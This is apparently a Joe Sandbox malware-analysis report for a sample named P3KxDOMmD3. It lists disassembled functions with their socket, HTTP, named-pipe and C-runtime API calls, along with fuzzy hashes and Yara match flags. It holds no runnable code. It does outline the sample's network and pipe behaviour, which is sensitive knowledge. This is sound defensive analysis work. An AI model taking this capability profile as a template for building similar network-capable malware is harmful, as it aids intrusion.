Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
Instruction Fuzzy Hash: 60C012DBE1DEC15AE72342544C7509F3ED694F2D1030F4046CF4402753A1460C106251

Function 00402F62 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C

Function 00692078 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322

Function 00676BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 00676C3D
select.WS2_32 ref: 00676CAB
__WSAFDIsSet.WS2_32 ref: 00676CC3
accept.WS2_32 ref: 00676CE0
ioctlsocket.WS2_32 ref: 00676CF8
__WSAFDIsSet.WS2_32 ref: 00676D9B
accept.WS2_32 ref: 00676DB1

Part of subcall function 00675A20: ioctlsocket.WS2_32 ref: 00675A42

__WSAFDIsSet.WS2_32 ref: 00676E33
__WSAFDIsSet.WS2_32 ref: 00676E4B
closesocket.WS2_32 ref: 00676F0D

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: acceptioctlsocket$closesockethtonlselect
String ID:
API String ID: 2003300010-0
Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
Instruction ID: 3a22ab2671ea9756bc4af0d6e732f6acd978155fc56be1d3b0b411975531676c
Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
Instruction Fuzzy Hash: 2D919932710A919BDB60DF21E9507AD33A6F788B98F008229EB4E47F58DF35C665CB10

Function 0066EC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0066ECD3
_snprintf.LIBCMT ref: 0066ECFE
_snprintf.LIBCMT ref: 0066ED1A
_snprintf.LIBCMT ref: 0066EDCF
_snprintf.LIBCMT ref: 0066EDE6
HttpOpenRequestA.WININET ref: 0066EE32
HttpSendRequestA.WININET ref: 0066EE65
InternetCloseHandle.WININET ref: 0066EE7A
Sleep.KERNEL32 ref: 0066EE85
InternetCloseHandle.WININET ref: 0066EE98

Strings

%s%s, xrefs: 0066EDDB
*/*, xrefs: 0066EC2A

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
String ID: %s%s$*/*
API String ID: 3787158362-856325523
Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
Instruction ID: 4feb4164774b2fa1ebca02c0a566f91f923d055f021e5dab81b1decc33edf96a
Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
Instruction Fuzzy Hash: DC711236300B859AEB50DF65E8903ED37A2FB88788F504126EA4D13B68DF3EC51AC710

Function 006753E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006755E4
GetTickCount.KERNEL32 ref: 006755F0
CreateFileA.KERNEL32 ref: 0067561E
GetLastError.KERNEL32 ref: 0067562D
WaitNamedPipeA.KERNEL32 ref: 00675642
Sleep.KERNEL32 ref: 0067564F
GetTickCount.KERNEL32 ref: 00675655
GetLastError.KERNEL32 ref: 0067566B
GetLastError.KERNEL32 ref: 00675683
SetNamedPipeHandleState.KERNEL32 ref: 006756AE
GetLastError.KERNEL32 ref: 006756B8
DisconnectNamedPipe.KERNEL32 ref: 00675732

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
String ID:
API String ID: 34948862-0
Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
Instruction ID: 6e884b6e5ffd85282d21a74658fbec779b271abfe7c071b39529fe0f93f4ef17
Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
Instruction Fuzzy Hash: B541AB32704F01D6EB00DB61E8647AD336BE388BA4F908225DE2F47BA4DF79C4668740

Function 0067FE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0067FE36

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_invalid_parameter_noinfo.LIBCMT ref: 0067FE42
__crtIsPackagedApp.LIBCMT ref: 0067FE53
AreFileApisANSI.KERNEL32 ref: 0067FE62
MultiByteToWideChar.KERNEL32 ref: 0067FE88
GetLastError.KERNEL32 ref: 0067FE95
_dosmaperr.LIBCMT ref: 0067FE9D

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1138158220-0
Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
Instruction ID: cf4228a557fd0e6063c7d3efb5bddca3d5e4dcbb782ebe834ceeb27299a869a2
Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
Instruction Fuzzy Hash: 2121C132300B4192EB50AF76E81472D77E7AB89FA4F148638EE4947BA6EF3CC5118705

Function 0067FF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 0067FF7D
free.LIBCMT ref: 0067FF9A

Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C

free.LIBCMT ref: 0067FFAF
free.LIBCMT ref: 0067FFD0
free.LIBCMT ref: 0067FFE5
free.LIBCMT ref: 0067FFF9
free.LIBCMT ref: 00680005
free.LIBCMT ref: 00680030
EncodePointer.KERNEL32 ref: 00680038
free.LIBCMT ref: 00680051
free.LIBCMT ref: 0068006A
free.LIBCMT ref: 0068009B

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction ID: f1ad4a06997b4ec404ae2e7d0c08ef39ca67135b9a45530cf5c6cb660311c64c
Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction Fuzzy Hash: 81316D25301A4085FE44FF51E8607B423A3BB46B90F084629DD5E177A2DF7EC964CB06

Function 00677308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00677336
select.WS2_32 ref: 0067738D
__WSAFDIsSet.WS2_32 ref: 0067739C
__WSAFDIsSet.WS2_32 ref: 006773B4
GetTickCount.KERNEL32 ref: 006773BD
gethostbyname.WS2_32 ref: 006773D0
htons.WS2_32 ref: 006773E8
inet_addr.WS2_32 ref: 006773FA
sendto.WS2_32 ref: 00677423

Strings

d, xrefs: 00677347

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
Instruction ID: e4ac90b84feb32bba891d0a522a0d5fa65501591bdec2923f5d6bc6cc3296ff1
Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
Instruction Fuzzy Hash: 90319C32214B81D6DB20CF62F88479A77A6F788B98F005126EE8D47F28DF79C565CB40

Function 001C1B48 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227COMMON

Download Yara Rule

APIs

write_multi_char.LIBCMT ref: 001C1FEB
write_string.LIBCMT ref: 001C2008
write_multi_char.LIBCMT ref: 001C2025
write_string.LIBCMT ref: 001C2084
write_multi_char.LIBCMT ref: 001C20DD
free.LIBCMT ref: 001C20F1

Strings

, xrefs: 001C1FBF

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: write_multi_char$write_string$free
String ID:
API String ID: 2630409672-3916222277
Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
Instruction ID: 93fad225b0fb5ed7e81c76d3e0d515d3c62d7566275eba2a4f6cc3feda05745d
Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
Instruction Fuzzy Hash: 1591133374878496EB25CB65E404BAE7B70F7A6794F24100EEF8A57B99DB38C945CB00

Function 006771FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0067721C
select.WS2_32 ref: 00677282
__WSAFDIsSet.WS2_32 ref: 00677291
__WSAFDIsSet.WS2_32 ref: 006772A6
send.WS2_32 ref: 006772BC
WSAGetLastError.WS2_32 ref: 006772C7
Sleep.KERNEL32 ref: 006772D9
GetTickCount.KERNEL32 ref: 006772DF

Strings

d, xrefs: 0067722A

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
Instruction ID: efd5a79e5ba5b1a49d4fa8f9e830f0533f845b3e87a0d99194b745c716581666
Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
Instruction Fuzzy Hash: 9E219032218A8196D7609F21F88838E7366F784784F504225EBAD47F59DF39C5A4CB44

Function 0066FB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0066FB29
GetLastError.KERNEL32 ref: 0066FB83
GetTickCount.KERNEL32 ref: 0066FB8E
Sleep.KERNEL32 ref: 0066FB9E
GetLastError.KERNEL32 ref: 0066FBAB
WriteFile.KERNEL32 ref: 0066FBDE
WriteFile.KERNEL32 ref: 0066FC0D
FlushFileBuffers.KERNEL32 ref: 0066FC25
DisconnectNamedPipe.KERNEL32 ref: 0066FC2F
Sleep.KERNEL32 ref: 0066FC43

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
String ID:
API String ID: 3101085627-0
Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
Instruction ID: 20c444c17b0549a3d1c7f0f45b5fa1bf5f6f455f3e7158127a932f33e358a413
Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
Instruction Fuzzy Hash: A7318E32700A45AAEB10DFB9E49439D3377F784B98F514126EE0E97A29DF39C549C780

Function 001C621C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001C624E

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

__doserrno.LIBCMT ref: 001C6245

Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC

__doserrno.LIBCMT ref: 001C62AB
_errno.LIBCMT ref: 001C62B2
_invalid_parameter_noinfo.LIBCMT ref: 001C6316

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
Instruction ID: 38d4aac9496663a0b74bc99d89ee2c492c4ed760ec678c284055fd81f10a89bb
Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
Instruction Fuzzy Hash: B8210632710394D6C7066FB59C92F2D3620BBB2BA0F95922DEE2517793CB78C892C710

Function 00686E1C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00686E4E

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

__doserrno.LIBCMT ref: 00686E45

Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC

__doserrno.LIBCMT ref: 00686EAB
_errno.LIBCMT ref: 00686EB2
_invalid_parameter_noinfo.LIBCMT ref: 00686F16

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
Instruction ID: 7cfaa5dcb511f5f5a62132100b7c36c6074cf6fcc5c00208eaf73f742b1eeb31
Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
Instruction Fuzzy Hash: AE21F17231035086C757BF76E89132D3657AB82BA0F958329FE212B792CB7CC8428715

Function 001CF150 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 001CF176
_errno.LIBCMT ref: 001CF16B

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
Instruction ID: 07de931665cf7b0ae0fbed8da54a5f8435d64601eeafdbe7b98d6462026b7dde
Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
Instruction Fuzzy Hash: 0341447A610395C2DF24AB62C401BAD72A2E775BE4FA8423EEB9443B85D738C943C700

Function 0068FD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0068FD76
_errno.LIBCMT ref: 0068FD6B

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
Instruction ID: 4d6e19287958bf355a1f7852a4977f97c7be83c3748a9460f70b2f05641afc63
Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
Instruction Fuzzy Hash: 0841477261039186DF20FB2294442FD77A3EB65BE4FA44336EB9447BA6D739C8928700

Function 0068027C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00680264: _mtinitlocknum.LIBCMT ref: 00683DAA
Part of subcall function 00680264: _amsg_exit.LIBCMT ref: 00683DB6

DecodePointer.KERNEL32 ref: 006802D8
DecodePointer.KERNEL32 ref: 006802F6
EncodePointer.KERNEL32 ref: 00680324
DecodePointer.KERNEL32 ref: 00680339
EncodePointer.KERNEL32 ref: 00680344
DecodePointer.KERNEL32 ref: 00680356
DecodePointer.KERNEL32 ref: 00680366
__crtCorExitProcess.LIBCMT ref: 006803EA
ExitProcess.KERNEL32 ref: 006803F2

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
String ID:
API String ID: 1550138920-0
Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
Instruction ID: 9df82419cd52bf638c99b27bdb88a8babd163be2b3f9864eb32f8bca7f94e206
Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
Instruction Fuzzy Hash: D7418031216B5297F690AF11FC5431973A7F788BD4F440629E98E93B24DF39C5A98700

Function 00676500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00676541
htons.WS2_32 ref: 00676552
socket.WS2_32 ref: 00676594
closesocket.WS2_32 ref: 006765A9
gethostbyname.WS2_32 ref: 006765C8
htons.WS2_32 ref: 006765F8
ioctlsocket.WS2_32 ref: 00676612
connect.WS2_32 ref: 0067662A
WSAGetLastError.WS2_32 ref: 00676634

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3339321253-0
Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
Instruction ID: b1788b8707f78e1acc7366027eacb695295fd0740c809ae3d58e72257b77e0e2
Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
Instruction Fuzzy Hash: 97316922314A91A2EB24DF21E8647AE6367F744BA8F544134EE0E47B98EF3DC659C740

Function 00676B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00676BE0: htonl.WS2_32 ref: 00676C3D
Part of subcall function 00676BE0: select.WS2_32 ref: 00676CAB
Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676CC3
Part of subcall function 00676BE0: accept.WS2_32 ref: 00676CE0
Part of subcall function 00676BE0: ioctlsocket.WS2_32 ref: 00676CF8
Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676D9B

GetTickCount.KERNEL32 ref: 00676BAA

Part of subcall function 00676F2C: malloc.LIBCMT ref: 00676F5E
Part of subcall function 00676F2C: htonl.WS2_32 ref: 00676F91
Part of subcall function 00676F2C: recvfrom.WS2_32 ref: 00676FD5
Part of subcall function 00676F2C: WSAGetLastError.WS2_32 ref: 00676FE2

GetTickCount.KERNEL32 ref: 00676BC2
GetTickCount.KERNEL32 ref: 006770E0
GetTickCount.KERNEL32 ref: 006770F6
shutdown.WS2_32 ref: 00677115
shutdown.WS2_32 ref: 0067712A
closesocket.WS2_32 ref: 00677134
free.LIBCMT ref: 00677154
free.LIBCMT ref: 00677169

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
String ID:
API String ID: 3610715900-0
Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
Instruction ID: d8f480d3902b15dbd3bfb10997250aad907e18a79d7c5dc3265a71454a942d6c
Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
Instruction Fuzzy Hash: F2218D72204A42C2DB209F72E85436923A7F748F88F18C225DE4D87725DF75C9A1CB56

Function 001C7008 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001C7033

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

__doserrno.LIBCMT ref: 001C702B

Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC

__lock_fhandle.LIBCMT ref: 001C7077
_lseeki64_nolock.LIBCMT ref: 001C7090

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
String ID:
API String ID: 4140391395-0
Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
Instruction ID: 058669ddc30177cea810e3a2b2250b9773ba6fff2ecb30b693514bc95a488f4f
Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
Instruction Fuzzy Hash: 8711022270428055EB052F659802B7DBA11A7B2BB1F19471CBE350B7D2CBBCC8A1CB21

Function 001C6E90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001C6EBB

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

__doserrno.LIBCMT ref: 001C6EB3

Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC

__lock_fhandle.LIBCMT ref: 001C6EFF
_lseek_nolock.LIBCMT ref: 001C6F18

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
String ID:
API String ID: 310312816-0
Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
Instruction ID: bfdf8927219a1c0db9bc5fb0f70ec63aa55916b6475b4c1005a446d7f9587be5
Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
Instruction Fuzzy Hash: 0D11033270068055D7066F65E862B7D6A61BBB1BA1F5A422DBA150B3D2CB7CC891C724

Function 00687A90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00687ABB

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

__doserrno.LIBCMT ref: 00687AB3

Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC

__lock_fhandle.LIBCMT ref: 00687AFF
_lseek_nolock.LIBCMT ref: 00687B18

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
String ID:
API String ID: 310312816-0
Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
Instruction ID: 24f0610d08a0e9dc992270e57341d53098f47f79d343df18f8d8b644598904b5
Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
Instruction Fuzzy Hash: 2411783270824046E7167F65E89136DB663BB817A1F29431DEE251B3D1CB7CC882D719

Function 00687C08 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00687C33

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

__doserrno.LIBCMT ref: 00687C2B

Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC

__lock_fhandle.LIBCMT ref: 00687C77
_lseeki64_nolock.LIBCMT ref: 00687C90

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
String ID:
API String ID: 4140391395-0
Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
Instruction ID: 5dc25f8dcf996d4c8157047387c0dd1f90f798925ef1df76545ee2abbc0fabdd
Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
Instruction Fuzzy Hash: 451156327086404AEB567F26E85136D7A53AB81BB1F294718FE391B3D2CB3CC442C729

